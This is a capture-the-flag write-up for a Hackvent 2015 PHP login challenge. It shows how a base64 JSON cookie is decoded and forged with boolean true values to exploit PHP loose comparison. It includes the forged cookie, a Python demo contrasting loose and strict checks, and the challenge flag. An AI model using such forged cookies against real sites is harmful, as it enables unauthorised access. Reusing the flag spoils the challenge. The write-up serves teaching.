Link to challenge: http://hackvent.hacking-lab.com
Date Completed: 08 December 2015
Challenge
The challenge required one to enter a username and password to log in to a website. The website was running PHP 5.4.
Link to website (may be down): http://hackvent.hacking-lab.com/xMasStore_wqbrGjHxxZ9YkbfiKiGC/index.php
Solution
I inspect the source of the website and take a look at the background image but that seems to be fine. There is nothing else of interest on the website so I figure this may require a brute-force attack.
I then however find a cookie that is generated once I fail to authenticate with the website. I try to log in using the username admin and the password pass. The following cookie is generated for me:
eyJ1c2VyIjoiYWRtaW4iLCJwYXNzd29yZCI6InBhc3MifQ%3D%3D
I then replace %3D with = and decode the above as base64.
eyJ1c2VyIjoiYWRtaW4iLCJwYXNzd29yZCI6InBhc3MifQ==
Decoded: {"user":"admin","password":"pass"}
Thus it is obvious that the cookie is simply calculated like so:
cookie = base64_enc(JSON.stringify(json_data))
I then try to tinker with the cookie fields. I figure that the challenge would not be making any database calls and thus the password would be hardcoded. In this case, the PHP code in the authentication script would look like so:
if ($pass === SOMETHING) {....}
The above uses strict comparison. However, the PHP script may use loose comparison which opens up a vulnerability. This turns out to be the case and the script does something like this:
if ($pass == SOMETHING) {....}
In the above examples the value we supply for $pass can be anything we want it to be; it does not have to be a string, because the JSON in the cookie is decoded into native PHP types. We could modify our JSON payload to pass a value like true as the username and password. This is what we will do, as a loose comparison with true is almost always true (unless the true username or password is “0”, which is unlikely).
We construct our payload:
{"user":true,"password":true}
Then we encode this using base64 (converting all = symbols back to %3D):
eyJ1c2VyIjp0cnVlLCJwYXNzd29yZCI6dHJ1ZX0=
eyJ1c2VyIjp0cnVlLCJwYXNzd29yZCI6dHJ1ZX0%3D
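As an added illustration (not code from the challenge or the original writeup), the following Python builds and decodes the cookie exactly as described above and emulates PHP's loose `==` on booleans beside a strict, type-checked comparison, so the `true` payload can be seen passing the one and failing the other. The hardcoded credentials and the two check functions are assumptions for the demonstration.

```python
import base64
import json

def encode_cookie(data: dict) -> str:
    """Mirror the challenge cookie: base64(JSON) with '=' padding written as %3D."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    return base64.b64encode(raw).decode().replace("=", "%3D")

def decode_cookie(cookie: str) -> dict:
    """Reverse of encode_cookie; JSON true/false become Python bools, as in PHP json_decode."""
    return json.loads(base64.b64decode(cookie.replace("%3D", "=")))

def php_loose_eq(a, b) -> bool:
    """Emulate PHP 5 '==' for the case this page relies on: when either side is a bool,
    the other side is cast to bool, and only '' and '0' cast to false.
    Other PHP juggling (numeric strings etc.) is out of scope and falls back to plain equality."""
    if isinstance(a, bool) or isinstance(b, bool):
        def to_bool(v):
            if isinstance(v, bool):
                return v
            if isinstance(v, str):
                return v not in ("", "0")
            return bool(v)
        return to_bool(a) == to_bool(b)
    return a == b

def check_login_loose(cookie: str, real_user: str, real_pass: str) -> bool:
    """Vulnerable check: the equivalent of `if ($user == USER && $pass == PASS)`."""
    d = decode_cookie(cookie)
    return php_loose_eq(d["user"], real_user) and php_loose_eq(d["password"], real_pass)

def check_login_strict(cookie: str, real_user: str, real_pass: str) -> bool:
    """Hardened check: the equivalent of `===`, which also requires both operands to be strings."""
    d = decode_cookie(cookie)
    return (isinstance(d["user"], str) and d["user"] == real_user
            and isinstance(d["password"], str) and d["password"] == real_pass)

if __name__ == "__main__":
    forged = encode_cookie({"user": True, "password": True})
    print(forged)
    # Hypothetical hardcoded credentials for the demonstration.
    print("loose:", check_login_loose(forged, "admin", "s3cret"))
    print("strict:", check_login_strict(forged, "admin", "s3cret"))
```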
Finally, we use a scripting language or a web browser extension (I used EditThisCookie for Chrome) to load the cookie for the webpage. Then we refresh the page and are greeted with the following message:
Welcome admin! Here is your daily goodie:
The goodie is our flag!
Flag: HV15-0Ch0-91zo-m99Y-kxGI-8iQ5